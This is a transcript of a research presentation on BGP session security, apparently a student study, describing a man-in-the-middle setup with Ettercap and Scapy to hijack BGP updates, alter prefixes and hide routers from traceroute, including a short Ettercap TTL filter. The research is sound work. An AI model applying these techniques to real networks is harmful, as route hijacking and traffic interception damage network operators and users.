1 / 25

A Study in TCP/BGP Session Security

A Study in TCP/BGP Session Security. By Ilias Pallikarakis. Motivation. Inadequate security in BGP Defcon 16 Presentation by Pilosov and Kapela Is it possible to replicate the attacks using a MitM approach ? . BGP Security. Mechanisms currently used : TCP-MD5

myrrh
Download Presentation

A Study in TCP/BGP Session Security

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. A Study in TCP/BGP Session Security By Ilias Pallikarakis

  2. Motivation • Inadequate security in BGP • Defcon 16 Presentation by Pilosov and Kapela • Is it possible to replicate the attacks using a MitM approach ?

  3. BGP Security • Mechanisms currently used : • TCP-MD5 • Generalized TTL Security Mechanism (GTSM) • Mechanisms to be implemented : • TCP-AO • RPKI

  4. Defcon 16 Presentation Overview They successfully advertised fake prefixes. Made the attack hard to detect by making the router advertising the fake prefixes ‘undetectable’ by the traceroute tool.

  5. Main Goals Set a MitM attack between two routers and attempt to hijack the BGP session Implement a script similar to the one of Defcon 16 to hide part of the network

  6. Tools Used • Ettercap : • MitM (ARP Poison) • Network Hiding • Scapy : • Network Hiding • BGP Session Hijacking

  7. Tools Used • Ettercap : • Easy to use • Good for simple script but not for complex • NO user intercation • Scapy : • Python library • Automatically calculates length/checksum fields • Much slower

  8. Testing Network

  9. General Methodology • Hide Network : • Exploit Traceroute’s function • Increase TTL to hide network from traceroute • BGP Session Hijacking: • Intercept the BGP update messages • Find a specific prefix and alter it

  10. BGP Hijacking Issues • Manipulate IP/TCP checksums • Manipulate variable length field : • IP Length • BGP Header Length • BGP Update Length fields • TCP session manipulation

  11. TCP Session Manipulation What if the altered BGP Prefix has different length than the original ? Need to adjust Sequence/Acknowledgement numbers : Keep the offset and Add/Remove it (Best) Copy previous sequence to next Acknowledgement and vice versa (Easiest)

  12. Sequence Adjusting Mechanism • Next Acknowledgement number is always the previous Sequence + original message’s length • For Sequence number there are 2 cases : • The previous message was sent by the receiver (previous ack) • Previous message sent by the sender (previous forged seq)

  13. Example

  14. Ettercap TTL Script In one word Simple… : if (ip.dst == '1.1.1.1'){ ip.ttl+= 3; msg("Increase TTL\n"); }

  15. Ettercap Script BGP Not possible : Human processing in Binary. Cannot manipulate variable length fields. Can replace only 2-byte length strings.

  16. Scapy Methodology Scripts are composed by : Main : Create the nfqueue and calls Process Process : mainly filters packets and calls altering function Altering Function : Varied content, does the packet altering

  17. Scapy BGP issues • Originally Scapy could not understand multiple BGP update messages in the same TCP packet • Would read only first update. • Incorrect length calculation. Unexpected session establishment : • While a TCP/BGP session was working one of the routers attempted to setup a new one.

  18. BGP Issue Solutions • BGP Multiple Update Messages : • Use the Header Marker to find how many messages appear. • Modified original Scapy code for BGP • Unexpected Sessions : • Drop all packets where one port is 179 and the other one is NOT the working session.

  19. Cisco Issue : Description Strange packets observed of the form : Circumstances of appearance : Change prefix length with Incorrect Seq/Ack Change prefix to lower length with working Script (occasionally)

  20. Cisco Issue : Thoughts Definitely related with seq/ack numbers. Test showed that when ack is larger issue always appears. Why it appears in correct script ??

  21. Cisco Issue : Thoughts Test correct script for potential mistake Thoroughly check the TCP flags before the strange packets. Check strange traffic message by message in contrast to the same traffic sent by router.

  22. Conclusion • Working script (implemented in two different ways !) to increase TTL. • Successful traceroute veil. • Renders GTSM obsolete. • Working TCP Adjusting Mechanism • Could be used in all TCP communication

  23. Conclusion Successfully replaced a prefix with one of our choice with Scapy Contributed in Scapy BGP allowing multiple Updates to be sent/received Discovery of Cisco issue

  24. Tests Live Demonstration !

  25. Thank You !

More Related